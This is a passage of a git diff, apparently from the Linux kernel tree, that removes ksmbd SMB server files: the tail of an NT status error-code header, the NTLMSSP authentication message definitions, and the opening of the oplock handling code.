+-#define NT_STATUS_FILES_OPEN (0xC0000000 | 0x0107)
+-#define NT_STATUS_CONNECTION_IN_USE (0xC0000000 | 0x0108)
+-#define NT_STATUS_MESSAGE_NOT_FOUND (0xC0000000 | 0x0109)
+-#define NT_STATUS_PROCESS_IS_TERMINATING (0xC0000000 | 0x010a)
+-#define NT_STATUS_INVALID_LOGON_TYPE (0xC0000000 | 0x010b)
+-#define NT_STATUS_NO_GUID_TRANSLATION (0xC0000000 | 0x010c)
+-#define NT_STATUS_CANNOT_IMPERSONATE (0xC0000000 | 0x010d)
+-#define NT_STATUS_IMAGE_ALREADY_LOADED (0xC0000000 | 0x010e)
+-#define NT_STATUS_ABIOS_NOT_PRESENT (0xC0000000 | 0x010f)
+-#define NT_STATUS_ABIOS_LID_NOT_EXIST (0xC0000000 | 0x0110)
+-#define NT_STATUS_ABIOS_LID_ALREADY_OWNED (0xC0000000 | 0x0111)
+-#define NT_STATUS_ABIOS_NOT_LID_OWNER (0xC0000000 | 0x0112)
+-#define NT_STATUS_ABIOS_INVALID_COMMAND (0xC0000000 | 0x0113)
+-#define NT_STATUS_ABIOS_INVALID_LID (0xC0000000 | 0x0114)
+-#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE (0xC0000000 | 0x0115)
+-#define NT_STATUS_ABIOS_INVALID_SELECTOR (0xC0000000 | 0x0116)
+-#define NT_STATUS_NO_LDT (0xC0000000 | 0x0117)
+-#define NT_STATUS_INVALID_LDT_SIZE (0xC0000000 | 0x0118)
+-#define NT_STATUS_INVALID_LDT_OFFSET (0xC0000000 | 0x0119)
+-#define NT_STATUS_INVALID_LDT_DESCRIPTOR (0xC0000000 | 0x011a)
+-#define NT_STATUS_INVALID_IMAGE_NE_FORMAT (0xC0000000 | 0x011b)
+-#define NT_STATUS_RXACT_INVALID_STATE (0xC0000000 | 0x011c)
+-#define NT_STATUS_RXACT_COMMIT_FAILURE (0xC0000000 | 0x011d)
+-#define NT_STATUS_MAPPED_FILE_SIZE_ZERO (0xC0000000 | 0x011e)
+-#define NT_STATUS_TOO_MANY_OPENED_FILES (0xC0000000 | 0x011f)
+-#define NT_STATUS_CANCELLED (0xC0000000 | 0x0120)
+-#define NT_STATUS_CANNOT_DELETE (0xC0000000 | 0x0121)
+-#define NT_STATUS_INVALID_COMPUTER_NAME (0xC0000000 | 0x0122)
+-#define NT_STATUS_FILE_DELETED (0xC0000000 | 0x0123)
+-#define NT_STATUS_SPECIAL_ACCOUNT (0xC0000000 | 0x0124)
+-#define NT_STATUS_SPECIAL_GROUP (0xC0000000 | 0x0125)
+-#define NT_STATUS_SPECIAL_USER (0xC0000000 | 0x0126)
+-#define NT_STATUS_MEMBERS_PRIMARY_GROUP (0xC0000000 | 0x0127)
+-#define NT_STATUS_FILE_CLOSED (0xC0000000 | 0x0128)
+-#define NT_STATUS_TOO_MANY_THREADS (0xC0000000 | 0x0129)
+-#define NT_STATUS_THREAD_NOT_IN_PROCESS (0xC0000000 | 0x012a)
+-#define NT_STATUS_TOKEN_ALREADY_IN_USE (0xC0000000 | 0x012b)
+-#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED (0xC0000000 | 0x012c)
+-#define NT_STATUS_COMMITMENT_LIMIT (0xC0000000 | 0x012d)
+-#define NT_STATUS_INVALID_IMAGE_LE_FORMAT (0xC0000000 | 0x012e)
+-#define NT_STATUS_INVALID_IMAGE_NOT_MZ (0xC0000000 | 0x012f)
+-#define NT_STATUS_INVALID_IMAGE_PROTECT (0xC0000000 | 0x0130)
+-#define NT_STATUS_INVALID_IMAGE_WIN_16 (0xC0000000 | 0x0131)
+-#define NT_STATUS_LOGON_SERVER_CONFLICT (0xC0000000 | 0x0132)
+-#define NT_STATUS_TIME_DIFFERENCE_AT_DC (0xC0000000 | 0x0133)
+-#define NT_STATUS_SYNCHRONIZATION_REQUIRED (0xC0000000 | 0x0134)
+-#define NT_STATUS_DLL_NOT_FOUND (0xC0000000 | 0x0135)
+-#define NT_STATUS_OPEN_FAILED (0xC0000000 | 0x0136)
+-#define NT_STATUS_IO_PRIVILEGE_FAILED (0xC0000000 | 0x0137)
+-#define NT_STATUS_ORDINAL_NOT_FOUND (0xC0000000 | 0x0138)
+-#define NT_STATUS_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0139)
+-#define NT_STATUS_CONTROL_C_EXIT (0xC0000000 | 0x013a)
+-#define NT_STATUS_LOCAL_DISCONNECT (0xC0000000 | 0x013b)
+-#define NT_STATUS_REMOTE_DISCONNECT (0xC0000000 | 0x013c)
+-#define NT_STATUS_REMOTE_RESOURCES (0xC0000000 | 0x013d)
+-#define NT_STATUS_LINK_FAILED (0xC0000000 | 0x013e)
+-#define NT_STATUS_LINK_TIMEOUT (0xC0000000 | 0x013f)
+-#define NT_STATUS_INVALID_CONNECTION (0xC0000000 | 0x0140)
+-#define NT_STATUS_INVALID_ADDRESS (0xC0000000 | 0x0141)
+-#define NT_STATUS_DLL_INIT_FAILED (0xC0000000 | 0x0142)
+-#define NT_STATUS_MISSING_SYSTEMFILE (0xC0000000 | 0x0143)
+-#define NT_STATUS_UNHANDLED_EXCEPTION (0xC0000000 | 0x0144)
+-#define NT_STATUS_APP_INIT_FAILURE (0xC0000000 | 0x0145)
+-#define NT_STATUS_PAGEFILE_CREATE_FAILED (0xC0000000 | 0x0146)
+-#define NT_STATUS_NO_PAGEFILE (0xC0000000 | 0x0147)
+-#define NT_STATUS_INVALID_LEVEL (0xC0000000 | 0x0148)
+-#define NT_STATUS_WRONG_PASSWORD_CORE (0xC0000000 | 0x0149)
+-#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT (0xC0000000 | 0x014a)
+-#define NT_STATUS_PIPE_BROKEN (0xC0000000 | 0x014b)
+-#define NT_STATUS_REGISTRY_CORRUPT (0xC0000000 | 0x014c)
+-#define NT_STATUS_REGISTRY_IO_FAILED (0xC0000000 | 0x014d)
+-#define NT_STATUS_NO_EVENT_PAIR (0xC0000000 | 0x014e)
+-#define NT_STATUS_UNRECOGNIZED_VOLUME (0xC0000000 | 0x014f)
+-#define NT_STATUS_SERIAL_NO_DEVICE_INITED (0xC0000000 | 0x0150)
+-#define NT_STATUS_NO_SUCH_ALIAS (0xC0000000 | 0x0151)
+-#define NT_STATUS_MEMBER_NOT_IN_ALIAS (0xC0000000 | 0x0152)
+-#define NT_STATUS_MEMBER_IN_ALIAS (0xC0000000 | 0x0153)
+-#define NT_STATUS_ALIAS_EXISTS (0xC0000000 | 0x0154)
+-#define NT_STATUS_LOGON_NOT_GRANTED (0xC0000000 | 0x0155)
+-#define NT_STATUS_TOO_MANY_SECRETS (0xC0000000 | 0x0156)
+-#define NT_STATUS_SECRET_TOO_LONG (0xC0000000 | 0x0157)
+-#define NT_STATUS_INTERNAL_DB_ERROR (0xC0000000 | 0x0158)
+-#define NT_STATUS_FULLSCREEN_MODE (0xC0000000 | 0x0159)
+-#define NT_STATUS_TOO_MANY_CONTEXT_IDS (0xC0000000 | 0x015a)
+-#define NT_STATUS_LOGON_TYPE_NOT_GRANTED (0xC0000000 | 0x015b)
+-#define NT_STATUS_NOT_REGISTRY_FILE (0xC0000000 | 0x015c)
+-#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x015d)
+-#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR (0xC0000000 | 0x015e)
+-#define NT_STATUS_FT_MISSING_MEMBER (0xC0000000 | 0x015f)
+-#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY (0xC0000000 | 0x0160)
+-#define NT_STATUS_ILLEGAL_CHARACTER (0xC0000000 | 0x0161)
+-#define NT_STATUS_UNMAPPABLE_CHARACTER (0xC0000000 | 0x0162)
+-#define NT_STATUS_UNDEFINED_CHARACTER (0xC0000000 | 0x0163)
+-#define NT_STATUS_FLOPPY_VOLUME (0xC0000000 | 0x0164)
+-#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND (0xC0000000 | 0x0165)
+-#define NT_STATUS_FLOPPY_WRONG_CYLINDER (0xC0000000 | 0x0166)
+-#define NT_STATUS_FLOPPY_UNKNOWN_ERROR (0xC0000000 | 0x0167)
+-#define NT_STATUS_FLOPPY_BAD_REGISTERS (0xC0000000 | 0x0168)
+-#define NT_STATUS_DISK_RECALIBRATE_FAILED (0xC0000000 | 0x0169)
+-#define NT_STATUS_DISK_OPERATION_FAILED (0xC0000000 | 0x016a)
+-#define NT_STATUS_DISK_RESET_FAILED (0xC0000000 | 0x016b)
+-#define NT_STATUS_SHARED_IRQ_BUSY (0xC0000000 | 0x016c)
+-#define NT_STATUS_FT_ORPHANING (0xC0000000 | 0x016d)
+-#define NT_STATUS_PARTITION_FAILURE (0xC0000000 | 0x0172)
+-#define NT_STATUS_INVALID_BLOCK_LENGTH (0xC0000000 | 0x0173)
+-#define NT_STATUS_DEVICE_NOT_PARTITIONED (0xC0000000 | 0x0174)
+-#define NT_STATUS_UNABLE_TO_LOCK_MEDIA (0xC0000000 | 0x0175)
+-#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA (0xC0000000 | 0x0176)
+-#define NT_STATUS_EOM_OVERFLOW (0xC0000000 | 0x0177)
+-#define NT_STATUS_NO_MEDIA (0xC0000000 | 0x0178)
+-#define NT_STATUS_NO_SUCH_MEMBER (0xC0000000 | 0x017a)
+-#define NT_STATUS_INVALID_MEMBER (0xC0000000 | 0x017b)
+-#define NT_STATUS_KEY_DELETED (0xC0000000 | 0x017c)
+-#define NT_STATUS_NO_LOG_SPACE (0xC0000000 | 0x017d)
+-#define NT_STATUS_TOO_MANY_SIDS (0xC0000000 | 0x017e)
+-#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x017f)
+-#define NT_STATUS_KEY_HAS_CHILDREN (0xC0000000 | 0x0180)
+-#define NT_STATUS_CHILD_MUST_BE_VOLATILE (0xC0000000 | 0x0181)
+-#define NT_STATUS_DEVICE_CONFIGURATION_ERROR (0xC0000000 | 0x0182)
+-#define NT_STATUS_DRIVER_INTERNAL_ERROR (0xC0000000 | 0x0183)
+-#define NT_STATUS_INVALID_DEVICE_STATE (0xC0000000 | 0x0184)
+-#define NT_STATUS_IO_DEVICE_ERROR (0xC0000000 | 0x0185)
+-#define NT_STATUS_DEVICE_PROTOCOL_ERROR (0xC0000000 | 0x0186)
+-#define NT_STATUS_BACKUP_CONTROLLER (0xC0000000 | 0x0187)
+-#define NT_STATUS_LOG_FILE_FULL (0xC0000000 | 0x0188)
+-#define NT_STATUS_TOO_LATE (0xC0000000 | 0x0189)
+-#define NT_STATUS_NO_TRUST_LSA_SECRET (0xC0000000 | 0x018a)
+-#define NT_STATUS_NO_TRUST_SAM_ACCOUNT (0xC0000000 | 0x018b)
+-#define NT_STATUS_TRUSTED_DOMAIN_FAILURE (0xC0000000 | 0x018c)
+-#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE (0xC0000000 | 0x018d)
+-#define NT_STATUS_EVENTLOG_FILE_CORRUPT (0xC0000000 | 0x018e)
+-#define NT_STATUS_EVENTLOG_CANT_START (0xC0000000 | 0x018f)
+-#define NT_STATUS_TRUST_FAILURE (0xC0000000 | 0x0190)
+-#define NT_STATUS_MUTANT_LIMIT_EXCEEDED (0xC0000000 | 0x0191)
+-#define NT_STATUS_NETLOGON_NOT_STARTED (0xC0000000 | 0x0192)
+-#define NT_STATUS_ACCOUNT_EXPIRED (0xC0000000 | 0x0193)
+-#define NT_STATUS_POSSIBLE_DEADLOCK (0xC0000000 | 0x0194)
+-#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT (0xC0000000 | 0x0195)
+-#define NT_STATUS_REMOTE_SESSION_LIMIT (0xC0000000 | 0x0196)
+-#define NT_STATUS_EVENTLOG_FILE_CHANGED (0xC0000000 | 0x0197)
+-#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT (0xC0000000 | 0x0198)
+-#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (0xC0000000 | 0x0199)
+-#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT (0xC0000000 | 0x019a)
+-#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT (0xC0000000 | 0x019b)
+-#define NT_STATUS_FS_DRIVER_REQUIRED (0xC0000000 | 0x019c)
+-#define NT_STATUS_NO_USER_SESSION_KEY (0xC0000000 | 0x0202)
+-#define NT_STATUS_USER_SESSION_DELETED (0xC0000000 | 0x0203)
+-#define NT_STATUS_RESOURCE_LANG_NOT_FOUND (0xC0000000 | 0x0204)
+-#define NT_STATUS_INSUFF_SERVER_RESOURCES (0xC0000000 | 0x0205)
+-#define NT_STATUS_INVALID_BUFFER_SIZE (0xC0000000 | 0x0206)
+-#define NT_STATUS_INVALID_ADDRESS_COMPONENT (0xC0000000 | 0x0207)
+-#define NT_STATUS_INVALID_ADDRESS_WILDCARD (0xC0000000 | 0x0208)
+-#define NT_STATUS_TOO_MANY_ADDRESSES (0xC0000000 | 0x0209)
+-#define NT_STATUS_ADDRESS_ALREADY_EXISTS (0xC0000000 | 0x020a)
+-#define NT_STATUS_ADDRESS_CLOSED (0xC0000000 | 0x020b)
+-#define NT_STATUS_CONNECTION_DISCONNECTED (0xC0000000 | 0x020c)
+-#define NT_STATUS_CONNECTION_RESET (0xC0000000 | 0x020d)
+-#define NT_STATUS_TOO_MANY_NODES (0xC0000000 | 0x020e)
+-#define NT_STATUS_TRANSACTION_ABORTED (0xC0000000 | 0x020f)
+-#define NT_STATUS_TRANSACTION_TIMED_OUT (0xC0000000 | 0x0210)
+-#define NT_STATUS_TRANSACTION_NO_RELEASE (0xC0000000 | 0x0211)
+-#define NT_STATUS_TRANSACTION_NO_MATCH (0xC0000000 | 0x0212)
+-#define NT_STATUS_TRANSACTION_RESPONDED (0xC0000000 | 0x0213)
+-#define NT_STATUS_TRANSACTION_INVALID_ID (0xC0000000 | 0x0214)
+-#define NT_STATUS_TRANSACTION_INVALID_TYPE (0xC0000000 | 0x0215)
+-#define NT_STATUS_NOT_SERVER_SESSION (0xC0000000 | 0x0216)
+-#define NT_STATUS_NOT_CLIENT_SESSION (0xC0000000 | 0x0217)
+-#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE (0xC0000000 | 0x0218)
+-#define NT_STATUS_DEBUG_ATTACH_FAILED (0xC0000000 | 0x0219)
+-#define NT_STATUS_SYSTEM_PROCESS_TERMINATED (0xC0000000 | 0x021a)
+-#define NT_STATUS_DATA_NOT_ACCEPTED (0xC0000000 | 0x021b)
+-#define NT_STATUS_NO_BROWSER_SERVERS_FOUND (0xC0000000 | 0x021c)
+-#define NT_STATUS_VDM_HARD_ERROR (0xC0000000 | 0x021d)
+-#define NT_STATUS_DRIVER_CANCEL_TIMEOUT (0xC0000000 | 0x021e)
+-#define NT_STATUS_REPLY_MESSAGE_MISMATCH (0xC0000000 | 0x021f)
+-#define NT_STATUS_MAPPED_ALIGNMENT (0xC0000000 | 0x0220)
+-#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH (0xC0000000 | 0x0221)
+-#define NT_STATUS_LOST_WRITEBEHIND_DATA (0xC0000000 | 0x0222)
+-#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID (0xC0000000 | 0x0223)
+-#define NT_STATUS_PASSWORD_MUST_CHANGE (0xC0000000 | 0x0224)
+-#define NT_STATUS_NOT_FOUND (0xC0000000 | 0x0225)
+-#define NT_STATUS_NOT_TINY_STREAM (0xC0000000 | 0x0226)
+-#define NT_STATUS_RECOVERY_FAILURE (0xC0000000 | 0x0227)
+-#define NT_STATUS_STACK_OVERFLOW_READ (0xC0000000 | 0x0228)
+-#define NT_STATUS_FAIL_CHECK (0xC0000000 | 0x0229)
+-#define NT_STATUS_DUPLICATE_OBJECTID (0xC0000000 | 0x022a)
+-#define NT_STATUS_OBJECTID_EXISTS (0xC0000000 | 0x022b)
+-#define NT_STATUS_CONVERT_TO_LARGE (0xC0000000 | 0x022c)
+-#define NT_STATUS_RETRY (0xC0000000 | 0x022d)
+-#define NT_STATUS_FOUND_OUT_OF_SCOPE (0xC0000000 | 0x022e)
+-#define NT_STATUS_ALLOCATE_BUCKET (0xC0000000 | 0x022f)
+-#define NT_STATUS_PROPSET_NOT_FOUND (0xC0000000 | 0x0230)
+-#define NT_STATUS_MARSHALL_OVERFLOW (0xC0000000 | 0x0231)
+-#define NT_STATUS_INVALID_VARIANT (0xC0000000 | 0x0232)
+-#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND (0xC0000000 | 0x0233)
+-#define NT_STATUS_ACCOUNT_LOCKED_OUT (0xC0000000 | 0x0234)
+-#define NT_STATUS_HANDLE_NOT_CLOSABLE (0xC0000000 | 0x0235)
+-#define NT_STATUS_CONNECTION_REFUSED (0xC0000000 | 0x0236)
+-#define NT_STATUS_GRACEFUL_DISCONNECT (0xC0000000 | 0x0237)
+-#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED (0xC0000000 | 0x0238)
+-#define NT_STATUS_ADDRESS_NOT_ASSOCIATED (0xC0000000 | 0x0239)
+-#define NT_STATUS_CONNECTION_INVALID (0xC0000000 | 0x023a)
+-#define NT_STATUS_CONNECTION_ACTIVE (0xC0000000 | 0x023b)
+-#define NT_STATUS_NETWORK_UNREACHABLE (0xC0000000 | 0x023c)
+-#define NT_STATUS_HOST_UNREACHABLE (0xC0000000 | 0x023d)
+-#define NT_STATUS_PROTOCOL_UNREACHABLE (0xC0000000 | 0x023e)
+-#define NT_STATUS_PORT_UNREACHABLE (0xC0000000 | 0x023f)
+-#define NT_STATUS_REQUEST_ABORTED (0xC0000000 | 0x0240)
+-#define NT_STATUS_CONNECTION_ABORTED (0xC0000000 | 0x0241)
+-#define NT_STATUS_BAD_COMPRESSION_BUFFER (0xC0000000 | 0x0242)
+-#define NT_STATUS_USER_MAPPED_FILE (0xC0000000 | 0x0243)
+-#define NT_STATUS_AUDIT_FAILED (0xC0000000 | 0x0244)
+-#define NT_STATUS_TIMER_RESOLUTION_NOT_SET (0xC0000000 | 0x0245)
+-#define NT_STATUS_CONNECTION_COUNT_LIMIT (0xC0000000 | 0x0246)
+-#define NT_STATUS_LOGIN_TIME_RESTRICTION (0xC0000000 | 0x0247)
+-#define NT_STATUS_LOGIN_WKSTA_RESTRICTION (0xC0000000 | 0x0248)
+-#define NT_STATUS_IMAGE_MP_UP_MISMATCH (0xC0000000 | 0x0249)
+-#define NT_STATUS_INSUFFICIENT_LOGON_INFO (0xC0000000 | 0x0250)
+-#define NT_STATUS_BAD_DLL_ENTRYPOINT (0xC0000000 | 0x0251)
+-#define NT_STATUS_BAD_SERVICE_ENTRYPOINT (0xC0000000 | 0x0252)
+-#define NT_STATUS_LPC_REPLY_LOST (0xC0000000 | 0x0253)
+-#define NT_STATUS_IP_ADDRESS_CONFLICT1 (0xC0000000 | 0x0254)
+-#define NT_STATUS_IP_ADDRESS_CONFLICT2 (0xC0000000 | 0x0255)
+-#define NT_STATUS_REGISTRY_QUOTA_LIMIT (0xC0000000 | 0x0256)
+-#define NT_STATUS_PATH_NOT_COVERED (0xC0000000 | 0x0257)
+-#define NT_STATUS_NO_CALLBACK_ACTIVE (0xC0000000 | 0x0258)
+-#define NT_STATUS_LICENSE_QUOTA_EXCEEDED (0xC0000000 | 0x0259)
+-#define NT_STATUS_PWD_TOO_SHORT (0xC0000000 | 0x025a)
+-#define NT_STATUS_PWD_TOO_RECENT (0xC0000000 | 0x025b)
+-#define NT_STATUS_PWD_HISTORY_CONFLICT (0xC0000000 | 0x025c)
+-#define NT_STATUS_PLUGPLAY_NO_DEVICE (0xC0000000 | 0x025e)
+-#define NT_STATUS_UNSUPPORTED_COMPRESSION (0xC0000000 | 0x025f)
+-#define NT_STATUS_INVALID_HW_PROFILE (0xC0000000 | 0x0260)
+-#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH (0xC0000000 | 0x0261)
+-#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND (0xC0000000 | 0x0262)
+-#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0263)
+-#define NT_STATUS_RESOURCE_NOT_OWNED (0xC0000000 | 0x0264)
+-#define NT_STATUS_TOO_MANY_LINKS (0xC0000000 | 0x0265)
+-#define NT_STATUS_QUOTA_LIST_INCONSISTENT (0xC0000000 | 0x0266)
+-#define NT_STATUS_FILE_IS_OFFLINE (0xC0000000 | 0x0267)
+-#define NT_STATUS_NETWORK_SESSION_EXPIRED  (0xC0000000 | 0x035c)
+-#define NT_STATUS_NO_SUCH_JOB (0xC0000000 | 0xEDE)     /* scheduler */
+-#define NT_STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP (0xC0000000 | 0x5D0000)
+-#define NT_STATUS_PENDING 0x00000103
+-#endif				/* _NTERR_H */
+diff --git a/fs/ksmbd/ntlmssp.h b/fs/ksmbd/ntlmssp.h
+deleted file mode 100644
+index f13153c18b4e9..0000000000000
+--- a/fs/ksmbd/ntlmssp.h
++++ /dev/null
+@@ -1,169 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2002,2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-#ifndef __KSMBD_NTLMSSP_H
+-#define __KSMBD_NTLMSSP_H
+-
+-#define NTLMSSP_SIGNATURE "NTLMSSP"
+-
+-/* Security blob target info data */
+-#define TGT_Name        "KSMBD"
+-
+-/*
+- * Size of the crypto key returned on the negotiate SMB in bytes
+- */
+-#define CIFS_CRYPTO_KEY_SIZE	(8)
+-#define CIFS_KEY_SIZE	(40)
+-
+-/*
+- * Size of encrypted user password in bytes
+- */
+-#define CIFS_ENCPWD_SIZE	(16)
+-#define CIFS_CPHTXT_SIZE	(16)
+-
+-/* Message Types */
+-#define NtLmNegotiate     cpu_to_le32(1)
+-#define NtLmChallenge     cpu_to_le32(2)
+-#define NtLmAuthenticate  cpu_to_le32(3)
+-#define UnknownMessage    cpu_to_le32(8)
+-
+-/* Negotiate Flags */
+-#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
+-#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
+-#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
+-/* define reserved9                       0x08 */
+-#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
+-#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
+-#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
+-#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
+-/* defined reserved 8                   0x0100 */
+-#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
+-#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
+-#define NTLMSSP_ANONYMOUS               0x0800
+-#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
+-#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
+-#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
+-#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
+-#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
+-#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
+-#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
+-#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
+-/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
+-#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
+-#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
+-#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
+-#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
+-/* #define reserved4                 0x1000000 */
+-#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we do not set */
+-/* #define reserved3                 0x4000000 */
+-/* #define reserved2                 0x8000000 */
+-/* #define reserved1                0x10000000 */
+-#define NTLMSSP_NEGOTIATE_128       0x20000000
+-#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
+-#define NTLMSSP_NEGOTIATE_56        0x80000000
+-
+-/* Define AV Pair Field IDs */
+-enum av_field_type {
+-	NTLMSSP_AV_EOL = 0,
+-	NTLMSSP_AV_NB_COMPUTER_NAME,
+-	NTLMSSP_AV_NB_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_COMPUTER_NAME,
+-	NTLMSSP_AV_DNS_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_TREE_NAME,
+-	NTLMSSP_AV_FLAGS,
+-	NTLMSSP_AV_TIMESTAMP,
+-	NTLMSSP_AV_RESTRICTION,
+-	NTLMSSP_AV_TARGET_NAME,
+-	NTLMSSP_AV_CHANNEL_BINDINGS
+-};
+-
+-/* Although typedefs are not commonly used for structure definitions */
+-/* in the Linux kernel, in this particular case they are useful      */
+-/* to more closely match the standards document for NTLMSSP from     */
+-/* OpenGroup and to make the code more closely match the standard in */
+-/* appearance */
+-
+-struct security_buffer {
+-	__le16 Length;
+-	__le16 MaximumLength;
+-	__le32 BufferOffset;	/* offset to buffer */
+-} __packed;
+-
+-struct target_info {
+-	__le16 Type;
+-	__le16 Length;
+-	__u8 Content[];
+-} __packed;
+-
+-struct negotiate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	struct security_buffer DomainName;	/* RFC 1001 style and ASCII */
+-	struct security_buffer WorkstationName;	/* RFC 1001 and ASCII */
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-	char DomainString[];
+-	/* followed by WorkstationString */
+-} __packed;
+-
+-struct challenge_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;   /* NtLmChallenge = 2 */
+-	struct security_buffer TargetName;
+-	__le32 NegotiateFlags;
+-	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
+-	__u8 Reserved[8];
+-	struct security_buffer TargetInfoArray;
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-} __packed;
+-
+-struct authenticate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
+-	struct security_buffer LmChallengeResponse;
+-	struct security_buffer NtChallengeResponse;
+-	struct security_buffer DomainName;
+-	struct security_buffer UserName;
+-	struct security_buffer WorkstationName;
+-	struct security_buffer SessionKey;
+-	__le32 NegotiateFlags;
+-	/*
+-	 * struct security_buffer for version info not present since we
+-	 * do not set the version is present flag
+-	 */
+-	char UserString[];
+-} __packed;
+-
+-struct ntlmv2_resp {
+-	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	__le32 blob_signature;
+-	__u32  reserved;
+-	__le64  time;
+-	__u64  client_chal; /* random */
+-	__u32  reserved2;
+-	/* array of name entries could follow ending in minimum 4 byte struct */
+-} __packed;
+-
+-/* per smb session structure/fields */
+-struct ntlmssp_auth {
+-	/* whether session key is per smb session */
+-	bool		sesskey_per_smbsess;
+-	/* sent by client in type 1 ntlmsssp exchange */
+-	__u32		client_flags;
+-	/* sent by server in type 2 ntlmssp exchange */
+-	__u32		conn_flags;
+-	/* sent to server */
+-	unsigned char	ciphertext[CIFS_CPHTXT_SIZE];
+-	/* used by ntlmssp */
+-	char		cryptkey[CIFS_CRYPTO_KEY_SIZE];
+-};
+-#endif /* __KSMBD_NTLMSSP_H */
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+deleted file mode 100644
+index 4b210cdd75569..0000000000000
+--- a/fs/ksmbd/oplock.c
++++ /dev/null
+@@ -1,1722 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/moduleparam.h>
+-
+-#include "glob.h"
+-#include "oplock.h"
+-
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-
+-static LIST_HEAD(lease_table_list);
+-static DEFINE_RWLOCK(lease_list_lock);
+-
+-/**
+- * alloc_opinfo() - allocate a new opinfo object for oplock info
+- * @work:	smb work
+- * @id:		fid of open file
+- * @Tid:	tree id of connection
+- *
+- * Return:      allocated opinfo object on success, otherwise NULL
+- */
+-static struct oplock_info *alloc_opinfo(struct ksmbd_work *work,
+-					u64 id, __u16 Tid)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct oplock_info *opinfo;
+-
+-	opinfo = kzalloc(sizeof(struct oplock_info), GFP_KERNEL);
+-	if (!opinfo)
+-		return NULL;
+-
+-	opinfo->sess = sess;
+-	opinfo->conn = conn;
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	opinfo->pending_break = 0;
+-	opinfo->fid = id;
+-	opinfo->Tid = Tid;
+-	INIT_LIST_HEAD(&opinfo->op_entry);
+-	INIT_LIST_HEAD(&opinfo->interim_list);
+-	init_waitqueue_head(&opinfo->oplock_q);
